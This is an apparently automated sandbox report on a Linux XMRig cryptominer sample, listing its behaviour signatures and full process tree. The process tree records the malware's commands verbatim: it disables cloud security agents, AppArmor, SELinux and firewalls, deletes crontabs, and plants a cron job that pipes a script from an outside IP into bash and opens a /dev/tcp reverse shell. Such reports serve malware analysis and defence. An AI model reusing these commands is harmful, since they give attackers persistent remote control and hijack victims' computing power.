Analysis
-
max time kernel
149s -
max time network
129s -
platform
ubuntu-24.04_amd64 -
resource
ubuntu2404-amd64-20240523-en -
resource tags
-
submitted
20-12-2024 14:46
General
-
Target
2024-12-20_ec006198d15565a8848fbe7062ec330a_hive_poet-rat
-
Size
6.9MB
-
MD5
ec006198d15565a8848fbe7062ec330a
-
SHA1
1eff0b0741f06c520ddc1d9e7ebd713cc1bea5cc
-
SHA256
826abc3becf8f35d4cc5d6d1a88d26820aa31abd1d27a9e260475ca1ddcdd84c
-
SHA512
d5f656f1c78f6d6f1f477ce6142e7f075976f6684dc8c942db40acf9034ea798b9bb4df9945eec271a143e9343d9906aea63fed3d9c6b28e212d041078dd88b9
-
SSDEEP
49152:2oHe1pxcmPvCldt6C+P2zw6foGB4FZbNvaNuAkpaDVcpj6vqcIINgRW24l2iyGfi:29OtePU9foGB4yuEZTvfl/A1zUEgNz
Score
10/10
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
-
Xmrig family
-
Xmrig_linux family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Adds new SSH keys 1 TTPs 1 IoCs
Linux special file to hold SSH keys. The threat actor may add new keys for further remote access.
-
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 1 IoCs
-
Modifies hosts file 1 IoCs
Adds to hosts file used for mapping hosts to IP addresses.
-
Checks hardware identifiers (DMI) 1 TTPs 4 IoCs
Checks DMI information which indicate if the system is a virtual machine.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Creates/modifies environment variables 1 TTPs 1 IoCs
Creating/modifying environment variables is a common persistence mechanism.
-
Disables AppArmor 47 IoCs
Disables AppArmor security module.
-
Disables SELinux 1 TTPs 2 IoCs
Disables SELinux security module.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies rc script 2 TTPs 1 IoCs
Adding/modifying system rc scripts is a common persistence mechanism.
-
Modifies systemd 2 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
-
Reads hardware information 1 TTPs 14 IoCs
Accesses system info like serial numbers, manufacturer names etc.
-
Modifies Bash startup script 2 TTPs 1 IoCs
-
Changes its process name 2 IoCs
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads CPU attributes 1 TTPs 50 IoCs
-
Command and Scripting Interpreter: Unix Shell 1 TTPs 45 IoCs
Execute scripts via Unix Shell.
-
Enumerates kernel/hardware configuration 1 TTPs 30 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/2024-12-20_ec006198d15565a8848fbe7062ec330a_hive_poet-rat/tmp/2024-12-20_ec006198d15565a8848fbe7062ec330a_hive_poet-rat1⤵
- Adds new SSH keys
- Modifies hosts file
- Creates/modifies Cron job
- Creates/modifies environment variables
- Modifies rc script
- Modifies systemd
- Modifies Bash startup script
- Enumerates kernel/hardware configuration
- Reads runtime system information
- Writes file to tmp directory
-
/bin/bash/bin/bash -c "pkill aliyun-service"2⤵
-
-
/usr/bin/pkillpkill aliyun-service2⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
/bin/sh/bin/sh -c "pkill aliyun-service"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/pkillpkill aliyun-service3⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
-
/bin/bash/bin/bash -c "rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service /usr/local/aegis"2⤵
-
-
/usr/bin/rmrm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service /usr/local/aegis2⤵
-
-
/bin/sh/bin/sh -c "rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service /usr/local/aegis"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/rmrm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service /usr/local/aegis3⤵
-
-
-
/bin/bash/bin/bash -c "systemctl stop aliyun.service"2⤵
-
-
/usr/bin/systemctlsystemctl stop aliyun.service2⤵
-
-
/bin/sh/bin/sh -c "systemctl stop aliyun.service"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/systemctlsystemctl stop aliyun.service3⤵
-
-
-
/bin/bash/bin/bash -c "systemctl disable aliyun.service"2⤵
-
-
/usr/bin/systemctlsystemctl disable aliyun.service2⤵
-
-
/bin/sh/bin/sh -c "systemctl disable aliyun.service"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/systemctlsystemctl disable aliyun.service3⤵
-
-
-
/bin/bash/bin/bash -c "service bcm-agent stop"2⤵
-
-
/usr/sbin/serviceservice bcm-agent stop2⤵
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
/usr/bin/systemctlsystemctl list-unit-files --full "--type=socket"3⤵
- Reads runtime system information
-
-
/usr/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"3⤵
-
-
-
/usr/local/sbin/systemctlsystemctl stop bcm-agent.service2⤵
-
-
/usr/local/bin/systemctlsystemctl stop bcm-agent.service2⤵
-
-
/usr/sbin/systemctlsystemctl stop bcm-agent.service2⤵
-
-
/usr/bin/systemctlsystemctl stop bcm-agent.service2⤵
-
-
/bin/sh/bin/sh -c "service bcm-agent stop"2⤵
-
/usr/sbin/serviceservice bcm-agent stop3⤵
-
/usr/bin/basenamebasename /usr/sbin/service4⤵
-
-
/usr/bin/basenamebasename /usr/sbin/service4⤵
-
-
/usr/bin/systemctlsystemctl list-unit-files --full "--type=socket"4⤵
-
-
/usr/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"4⤵
-
-
-
/usr/local/sbin/systemctlsystemctl stop bcm-agent.service3⤵
-
-
/usr/local/bin/systemctlsystemctl stop bcm-agent.service3⤵
-
-
/usr/sbin/systemctlsystemctl stop bcm-agent.service3⤵
-
-
/usr/bin/systemctlsystemctl stop bcm-agent.service3⤵
-
-
-
/bin/bash/bin/bash -c "yum remove bcm-agent -y"2⤵
-
-
/bin/sh/bin/sh -c "yum remove bcm-agent -y"2⤵
-
-
/bin/bash/bin/bash -c "apt-get remove bcm-agent -y"2⤵
-
-
/usr/bin/apt-getapt-get remove bcm-agent -y2⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
-
-
-
/bin/sh/bin/sh -c "apt-get remove bcm-agent -y"2⤵
-
/usr/bin/apt-getapt-get remove bcm-agent -y3⤵
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
-
-
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
-
-
-
-
/bin/bash/bin/bash -c "/usr/local/qcloud/stargate/admin/uninstalll.sh &"2⤵
-
/usr/local/qcloud/stargate/admin/uninstalll.sh/usr/local/qcloud/stargate/admin/uninstalll.sh3⤵
-
-
-
/bin/sh/bin/sh -c "/usr/local/qcloud/stargate/admin/uninstalll.sh &"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/local/qcloud/stargate/admin/uninstalll.sh/usr/local/qcloud/stargate/admin/uninstalll.sh3⤵
-
-
-
/bin/bash/bin/bash -c "/usr/local/qcloud/YunJing/uninst.sh &"2⤵
-
/usr/local/qcloud/YunJing/uninst.sh/usr/local/qcloud/YunJing/uninst.sh3⤵
-
-
-
/bin/sh/bin/sh -c "/usr/local/qcloud/YunJing/uninst.sh &"2⤵
- Command and Scripting Interpreter: Unix Shell
-
-
/bin/bash/bin/bash -c "/usr/local/qcloud/monitor/barad/admin/uninstall.sh &"2⤵
-
/usr/local/qcloud/monitor/barad/admin/uninstall.sh/usr/local/qcloud/monitor/barad/admin/uninstall.sh3⤵
-
-
-
/bin/sh/bin/sh -c "/usr/local/qcloud/monitor/barad/admin/uninstall.sh &"2⤵
- Command and Scripting Interpreter: Unix Shell
-
-
/bin/bash/bin/bash -c "ufw disable"2⤵
-
-
/bin/sh/bin/sh -c "ufw disable"2⤵
- Command and Scripting Interpreter: Unix Shell
-
-
/bin/bash/bin/bash -c "iptables -f"2⤵
- System Network Configuration Discovery
-
-
/bin/sh/bin/sh -c "iptables -f"2⤵
- Command and Scripting Interpreter: Unix Shell
- System Network Configuration Discovery
-
-
/bin/bash/bin/bash -c "sysctl kernel.nmi_watchdog=0"2⤵
-
-
/usr/sbin/sysctlsysctl "kernel.nmi_watchdog=0"2⤵
-
-
/bin/sh/bin/sh -c "sysctl kernel.nmi_watchdog=0"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/sbin/sysctlsysctl "kernel.nmi_watchdog=0"3⤵
-
-
-
/bin/bash/bin/bash -c "echo '0' >/proc/sys/kernel/nmi_watchdog"2⤵
-
-
/bin/sh/bin/sh -c "echo '0' >/proc/sys/kernel/nmi_watchdog"2⤵
- Command and Scripting Interpreter: Unix Shell
-
-
/bin/bash/bin/bash -c "'kernel.nmi_watchdog=0' >>/etc/sysctl.conf"2⤵
-
-
/bin/sh/bin/sh -c "'kernel.nmi_watchdog=0' >>/etc/sysctl.conf"2⤵
- Command and Scripting Interpreter: Unix Shell
-
-
/bin/bash/bin/bash -c "service apparmor stop"2⤵
-
-
/usr/sbin/serviceservice apparmor stop2⤵
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
/usr/bin/systemctlsystemctl list-unit-files --full "--type=socket"3⤵
-
-
/usr/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"3⤵
-
-
-
/usr/local/sbin/systemctlsystemctl stop apparmor.service2⤵
- Disables AppArmor
-
-
/usr/local/bin/systemctlsystemctl stop apparmor.service2⤵
- Disables AppArmor
-
-
/usr/sbin/systemctlsystemctl stop apparmor.service2⤵
- Disables AppArmor
-
-
/usr/bin/systemctlsystemctl stop apparmor.service2⤵
- Disables AppArmor
-
-
/bin/sh/bin/sh -c "service apparmor stop"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/sbin/serviceservice apparmor stop3⤵
-
/usr/bin/basenamebasename /usr/sbin/service4⤵
-
-
/usr/bin/basenamebasename /usr/sbin/service4⤵
-
-
/usr/bin/systemctlsystemctl list-unit-files --full "--type=socket"4⤵
- Disables AppArmor
-
-
/usr/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"4⤵
-
-
-
/usr/local/sbin/systemctlsystemctl stop apparmor.service3⤵
- Disables AppArmor
-
-
/usr/local/bin/systemctlsystemctl stop apparmor.service3⤵
- Disables AppArmor
-
-
/usr/sbin/systemctlsystemctl stop apparmor.service3⤵
- Disables AppArmor
-
-
/usr/bin/systemctlsystemctl stop apparmor.service3⤵
- Disables AppArmor
-
-
-
/bin/bash/bin/bash -c "systemctl disable apparmor"2⤵
-
-
/usr/bin/systemctlsystemctl disable apparmor2⤵
- Disables AppArmor
- Changes its process name
-
/usr/bin/getoptgetopt -o r: --long root: -- disable apparmor3⤵
-
-
/usr/sbin/update-rc.d/usr/sbin/update-rc.d apparmor defaults3⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵
- Disables AppArmor
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵
- Disables AppArmor
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵
- Disables AppArmor
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Disables AppArmor
-
-
-
/usr/sbin/update-rc.d/usr/sbin/update-rc.d apparmor disable3⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵
- Disables AppArmor
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵
- Disables AppArmor
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵
- Disables AppArmor
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Disables AppArmor
-
-
-
-
/bin/sh/bin/sh -c "systemctl disable apparmor"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/systemctlsystemctl disable apparmor3⤵
- Disables AppArmor
- Changes its process name
-
/usr/bin/getoptgetopt -o r: --long root: -- disable apparmor4⤵
-
-
/usr/sbin/update-rc.d/usr/sbin/update-rc.d apparmor defaults4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
-
-
-
/usr/sbin/update-rc.d/usr/sbin/update-rc.d apparmor disable4⤵
-
/usr/local/sbin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
-
-
/usr/local/bin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
-
-
/usr/sbin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
-
-
/usr/bin/systemctlsystemctl daemon-reload5⤵
- Disables AppArmor
-
-
-
-
-
/bin/bash/bin/bash -c "service aliyun-service stop"2⤵
-
-
/usr/sbin/serviceservice aliyun-service stop2⤵
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
/usr/bin/systemctlsystemctl list-unit-files --full "--type=socket"3⤵
- Disables AppArmor
-
-
/usr/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"3⤵
-
-
-
/usr/local/sbin/systemctlsystemctl stop aliyun-service.service2⤵
- Disables AppArmor
-
-
/usr/local/bin/systemctlsystemctl stop aliyun-service.service2⤵
- Disables AppArmor
-
-
/usr/sbin/systemctlsystemctl stop aliyun-service.service2⤵
- Disables AppArmor
-
-
/usr/bin/systemctlsystemctl stop aliyun-service.service2⤵
- Disables AppArmor
-
-
/bin/sh/bin/sh -c "service aliyun-service stop"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/sbin/serviceservice aliyun-service stop3⤵
-
/usr/bin/basenamebasename /usr/sbin/service4⤵
-
-
/usr/bin/basenamebasename /usr/sbin/service4⤵
-
-
/usr/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"4⤵
-
-
/usr/bin/systemctlsystemctl list-unit-files --full "--type=socket"4⤵
- Disables AppArmor
-
-
-
/usr/local/sbin/systemctlsystemctl stop aliyun-service.service3⤵
- Disables AppArmor
-
-
/usr/local/bin/systemctlsystemctl stop aliyun-service.service3⤵
- Disables AppArmor
-
-
/usr/sbin/systemctlsystemctl stop aliyun-service.service3⤵
- Disables AppArmor
-
-
/usr/bin/systemctlsystemctl stop aliyun-service.service3⤵
- Disables AppArmor
-
-
-
/bin/bash/bin/bash -c "setenforce 0"2⤵
-
-
/usr/sbin/setenforcesetenforce 02⤵
- Disables SELinux
-
-
/bin/sh/bin/sh -c "setenforce 0"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/sbin/setenforcesetenforce 03⤵
- Disables SELinux
-
-
-
/bin/bash/bin/bash -c "echo SELINUX=disabled >/etc/selinux/config"2⤵
-
-
/bin/sh/bin/sh -c "echo SELINUX=disabled >/etc/selinux/config"2⤵
- Command and Scripting Interpreter: Unix Shell
-
-
/bin/bash/bin/bash -c "kill -9 /tmp/*"2⤵
-
-
/bin/sh/bin/sh -c "kill -9 /tmp/*"2⤵
- Command and Scripting Interpreter: Unix Shell
-
-
/bin/bash/bin/bash -c "pkill /tmp/*"2⤵
-
-
/usr/bin/pkillpkill /tmp/2024-12-20_ec006198d15565a8848fbe7062ec330a_hive_poet-rat /tmp/gdm3-config-err-5nyx0v /tmp/gdm3-config-err-nbtXu0 /tmp/snap-private-tmp /tmp/systemd-private-db282fe03f154e6bb2997a71783d59bc-ModemManager.service-DwOiIt /tmp/systemd-private-db282fe03f154e6bb2997a71783d59bc-colord.service-hMioRj /tmp/systemd-private-db282fe03f154e6bb2997a71783d59bc-polkit.service-bOKKnG /tmp/systemd-private-db282fe03f154e6bb2997a71783d59bc-power-profiles-daemon.service-ajWWPk /tmp/systemd-private-db282fe03f154e6bb2997a71783d59bc-switcheroo-control.service-XezE5J /tmp/systemd-private-db282fe03f154e6bb2997a71783d59bc-systemd-logind.service-pJN8Km /tmp/systemd-private-db282fe03f154e6bb2997a71783d59bc-systemd-oomd.service-j5m4YH /tmp/systemd-private-db282fe03f154e6bb2997a71783d59bc-systemd-resolved.service-zgQZvg /tmp/systemd-private-db282fe03f154e6bb2997a71783d59bc-systemd-timedated.service-nbLJhi /tmp/systemd-private-db282fe03f154e6bb2997a71783d59bc-upower.service-GvtGHb2⤵
-
-
/bin/sh/bin/sh -c "pkill /tmp/*"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/pkillpkill /tmp/2024-12-20_ec006198d15565a8848fbe7062ec330a_hive_poet-rat /tmp/gdm3-config-err-5nyx0v /tmp/gdm3-config-err-nbtXu0 /tmp/snap-private-tmp /tmp/systemd-private-db282fe03f154e6bb2997a71783d59bc-ModemManager.service-DwOiIt /tmp/systemd-private-db282fe03f154e6bb2997a71783d59bc-colord.service-hMioRj /tmp/systemd-private-db282fe03f154e6bb2997a71783d59bc-polkit.service-bOKKnG /tmp/systemd-private-db282fe03f154e6bb2997a71783d59bc-power-profiles-daemon.service-ajWWPk /tmp/systemd-private-db282fe03f154e6bb2997a71783d59bc-switcheroo-control.service-XezE5J /tmp/systemd-private-db282fe03f154e6bb2997a71783d59bc-systemd-logind.service-pJN8Km /tmp/systemd-private-db282fe03f154e6bb2997a71783d59bc-systemd-oomd.service-j5m4YH /tmp/systemd-private-db282fe03f154e6bb2997a71783d59bc-systemd-resolved.service-zgQZvg /tmp/systemd-private-db282fe03f154e6bb2997a71783d59bc-systemd-timedated.service-nbLJhi /tmp/systemd-private-db282fe03f154e6bb2997a71783d59bc-upower.service-GvtGHb3⤵
-
-
-
/bin/bash/bin/bash -c "rm -rf /dev/shm/*"2⤵
-
-
/usr/bin/rmrm -rf "/dev/shm/*"2⤵
-
-
/bin/sh/bin/sh -c "rm -rf /dev/shm/*"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/rmrm -rf "/dev/shm/*"3⤵
-
-
-
/bin/bash/bin/bash -c "rm -rf /etc/cron.d/zdaemon"2⤵
-
-
/usr/bin/rmrm -rf /etc/cron.d/zdaemon2⤵
-
-
/bin/sh/bin/sh -c "rm -rf /etc/cron.d/zdaemon"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/rmrm -rf /etc/cron.d/zdaemon3⤵
-
-
-
/bin/bash/bin/bash -c "rm /etc/zclient && rm /etc/zdaemon"2⤵
-
/usr/bin/rmrm /etc/zclient3⤵
-
-
-
/bin/sh/bin/sh -c "rm /etc/zclient && rm /etc/zdaemon"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/rmrm /etc/zclient3⤵
-
-
-
/bin/bash/bin/bash -c "systemctl stop bot && systemctl disable bot && systemctl --user stop bot && systemctl --user disable bot"2⤵
-
/usr/bin/systemctlsystemctl stop bot3⤵
- Disables AppArmor
-
-
-
/bin/sh/bin/sh -c "systemctl stop bot && systemctl disable bot && systemctl --user stop bot && systemctl --user disable bot"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/systemctlsystemctl stop bot3⤵
- Disables AppArmor
-
-
-
/bin/bash/bin/bash -c "crontab -r"2⤵
-
-
/usr/bin/crontabcrontab -r2⤵
-
-
/bin/sh/bin/sh -c "crontab -r"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/crontabcrontab -r3⤵
-
-
-
/bin/bash/bin/bash -c "rm -rf /etc/ld.so.preload /usr/local/lib/[cmake.so] /usr/local/lib/pnscan.so /usr/local/lib/masscan.so /usr/local/lib/httpd.so /usr/local/lib/xmrigMiner.so /usr/local/lib/xmrigDaemon.so"2⤵
-
-
/usr/bin/rmrm -rf /etc/ld.so.preload "/usr/local/lib/[cmake.so]" /usr/local/lib/pnscan.so /usr/local/lib/masscan.so /usr/local/lib/httpd.so /usr/local/lib/xmrigMiner.so /usr/local/lib/xmrigDaemon.so2⤵
-
-
/bin/sh/bin/sh -c "rm -rf /etc/ld.so.preload /usr/local/lib/[cmake.so] /usr/local/lib/pnscan.so /usr/local/lib/masscan.so /usr/local/lib/httpd.so /usr/local/lib/xmrigMiner.so /usr/local/lib/xmrigDaemon.so"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/rmrm -rf /etc/ld.so.preload "/usr/local/lib/[cmake.so]" /usr/local/lib/pnscan.so /usr/local/lib/masscan.so /usr/local/lib/httpd.so /usr/local/lib/xmrigMiner.so /usr/local/lib/xmrigDaemon.so3⤵
-
-
-
/bin/bash/bin/bash -c "killall localupdatemanager && pkill -9 localupdatemanager && kill -9 localupdatemanager"2⤵
-
/usr/bin/killallkillall localupdatemanager3⤵
- Reads runtime system information
-
-
-
/bin/sh/bin/sh -c "killall localupdatemanager && pkill -9 localupdatemanager && kill -9 localupdatemanager"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/killallkillall localupdatemanager3⤵
- Reads runtime system information
-
-
-
/bin/bash/bin/bash -c "systemctl start sshd"2⤵
-
-
/usr/bin/systemctlsystemctl start sshd2⤵
- Disables AppArmor
-
-
/bin/sh/bin/sh -c "systemctl start sshd"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/systemctlsystemctl start sshd3⤵
- Disables AppArmor
-
-
-
/bin/bash/bin/bash -c "service start sshd"2⤵
-
-
/usr/sbin/serviceservice start sshd2⤵
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
/usr/bin/basenamebasename /usr/sbin/service3⤵
-
-
-
/bin/sh/bin/sh -c "service start sshd"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/sbin/serviceservice start sshd3⤵
-
/usr/bin/basenamebasename /usr/sbin/service4⤵
-
-
/usr/bin/basenamebasename /usr/sbin/service4⤵
-
-
-
-
/bin/bash/bin/bash -c "(crontab -l ; echo \"0 */12 * * * if command -v curl >/dev/null 2>&1; then curl -sSL http://107.189.14.109/.XiNp0ranO0ramodnez0vass/glaigrEJIFnmvs.sh | bash; else wget -qO- --no-check-certificate http://107.189.14.109/.XiNp0ranO0ramodnez0vass/glaigrEJIFnmvs.sh | bash; fi 0<&196;exec 196<>/dev/tcp/107.189.14.109/40233; sh <&196 >&196 2>&196) | crontab - "2⤵
-
-
/bin/sh/bin/sh -c "(crontab -l ; echo \"0 */12 * * * if command -v curl >/dev/null 2>&1; then curl -sSL http://107.189.14.109/.XiNp0ranO0ramodnez0vass/glaigrEJIFnmvs.sh | bash; else wget -qO- --no-check-certificate http://107.189.14.109/.XiNp0ranO0ramodnez0vass/glaigrEJIFnmvs.sh | bash; fi 0<&196;exec 196<>/dev/tcp/107.189.14.109/40233; sh <&196 >&196 2>&196) | crontab - "2⤵
- Command and Scripting Interpreter: Unix Shell
-
-
/bin/bash/bin/bash -c "systemctl --user enable localupdateservice.service && systemctl --user start localupdateservice.service"2⤵
-
/usr/bin/systemctlsystemctl --user enable localupdateservice.service3⤵
- Disables AppArmor
-
-
-
/bin/sh/bin/sh -c "systemctl --user enable localupdateservice.service && systemctl --user start localupdateservice.service"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/systemctlsystemctl --user enable localupdateservice.service3⤵
- Disables AppArmor
-
-
-
/bin/bash/bin/bash -c "systemctl enable localupdatedaemon && systemctl start localupdatedaemon"2⤵
-
/usr/bin/systemctlsystemctl enable localupdatedaemon3⤵
- Disables AppArmor
-
-
-
/usr/bin/systemctlsystemctl start localupdatedaemon2⤵
- Disables AppArmor
-
-
/bin/sh/bin/sh -c "systemctl enable localupdatedaemon && systemctl start localupdatedaemon"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/systemctlsystemctl enable localupdatedaemon3⤵
- Disables AppArmor
-
-
/usr/bin/systemctlsystemctl start localupdatedaemon3⤵
- Disables AppArmor
-
-
-
/bin/bash/bin/bash -c "sysctl -w vm.nr_hugepages=102400"2⤵
-
-
/usr/sbin/sysctlsysctl -w "vm.nr_hugepages=102400"2⤵
-
-
/bin/sh/bin/sh -c "sysctl -w vm.nr_hugepages=102400"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/sbin/sysctlsysctl -w "vm.nr_hugepages=102400"3⤵
-
-
-
/bin/bash/bin/bash -c "rm -rf /etc/.localconfig"2⤵
-
-
/usr/bin/rmrm -rf /etc/.localconfig2⤵
-
-
/bin/sh/bin/sh -c "rm -rf /etc/.localconfig"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/rmrm -rf /etc/.localconfig3⤵
-
-
-
/bin/bash/bin/bash -c "cp -r /etc/.localconfig/xmrig-6.19.3 /etc/.localconfig/updatemand"2⤵
-
-
/usr/bin/cpcp -r /etc/.localconfig/xmrig-6.19.3 /etc/.localconfig/updatemand2⤵
-
-
/bin/sh/bin/sh -c "cp -r /etc/.localconfig/xmrig-6.19.3 /etc/.localconfig/updatemand"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/cpcp -r /etc/.localconfig/xmrig-6.19.3 /etc/.localconfig/updatemand3⤵
-
-
-
/bin/bash/bin/bash -c "cp -r /etc/.localconfig/updatemand/xmrig /etc/.localconfig/updatemand/localupdatemanager"2⤵
-
-
/usr/bin/cpcp -r /etc/.localconfig/updatemand/xmrig /etc/.localconfig/updatemand/localupdatemanager2⤵
-
-
/bin/sh/bin/sh -c "cp -r /etc/.localconfig/updatemand/xmrig /etc/.localconfig/updatemand/localupdatemanager"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/cpcp -r /etc/.localconfig/updatemand/xmrig /etc/.localconfig/updatemand/localupdatemanager3⤵
-
-
-
/bin/bash/bin/bash -c "rm /etc/.localconfig/updatemand/xmrig"2⤵
-
-
/usr/bin/rmrm /etc/.localconfig/updatemand/xmrig2⤵
-
-
/bin/sh/bin/sh -c "rm /etc/.localconfig/updatemand/xmrig"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/rmrm /etc/.localconfig/updatemand/xmrig3⤵
-
-
-
/bin/bash/bin/bash -c "rm -rf /etc/.localconfig/xmrig-6.19.3"2⤵
-
-
/usr/bin/rmrm -rf /etc/.localconfig/xmrig-6.19.32⤵
-
-
/bin/sh/bin/sh -c "rm -rf /etc/.localconfig/xmrig-6.19.3"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/rmrm -rf /etc/.localconfig/xmrig-6.19.33⤵
-
-
-
/bin/bash/bin/bash -c "chmod +x /etc/.localconfig/updatemand/localupdatemanager"2⤵
- File and Directory Permissions Modification
-
-
/usr/bin/chmodchmod +x /etc/.localconfig/updatemand/localupdatemanager2⤵
- File and Directory Permissions Modification
-
-
/bin/sh/bin/sh -c "chmod +x /etc/.localconfig/updatemand/localupdatemanager"2⤵
- File and Directory Permissions Modification
-
/usr/bin/chmodchmod +x /etc/.localconfig/updatemand/localupdatemanager3⤵
- File and Directory Permissions Modification
-
-
-
/bin/bash/bin/bash -c "rm /etc/.localconfig/updatemand/config.json"2⤵
-
-
/usr/bin/rmrm /etc/.localconfig/updatemand/config.json2⤵
-
-
/bin/sh/bin/sh -c "rm /etc/.localconfig/updatemand/config.json"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/rmrm /etc/.localconfig/updatemand/config.json3⤵
-
-
-
/bin/bash/bin/bash -c "rm /etc/.localconfig/updatemand/SHA256SUMS"2⤵
-
-
/usr/bin/rmrm /etc/.localconfig/updatemand/SHA256SUMS2⤵
-
-
/bin/sh/bin/sh -c "rm /etc/.localconfig/updatemand/SHA256SUMS"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/rmrm /etc/.localconfig/updatemand/SHA256SUMS3⤵
-
-
-
/bin/bash/bin/bash -c "touch /etc/.localconfig/updatemand/config.json"2⤵
-
-
/usr/bin/touchtouch /etc/.localconfig/updatemand/config.json2⤵
-
-
/bin/sh/bin/sh -c "touch /etc/.localconfig/updatemand/config.json"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/touchtouch /etc/.localconfig/updatemand/config.json3⤵
-
-
-
/bin/bash/bin/bash -c "/bin/nohup /etc/.localconfig/updatemand/localupdatemanager > /dev/null &"2⤵
-
/bin/nohup/bin/nohup /etc/.localconfig/updatemand/localupdatemanager3⤵
-
-
-
/bin/bash/bin/bash -c "kill -9 765"2⤵
-
-
/bin/sh/bin/sh -c "kill -9 765"2⤵
- Command and Scripting Interpreter: Unix Shell
-
-
/bin/bash/bin/bash -c "pkill 765"2⤵
-
-
/usr/bin/pkillpkill 7652⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
/bin/sh/bin/sh -c "pkill 765"2⤵
- Command and Scripting Interpreter: Unix Shell
-
/usr/bin/pkillpkill 7653⤵
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Reads runtime system information
-
-
-
/bin/bash/bin/bash -c "killall polkitd"2⤵
-
-
/usr/bin/killallkillall polkitd2⤵
- Reads runtime system information
-
-
/bin/sh/bin/sh -c "killall polkitd"2⤵
- Command and Scripting Interpreter: Unix Shell
-
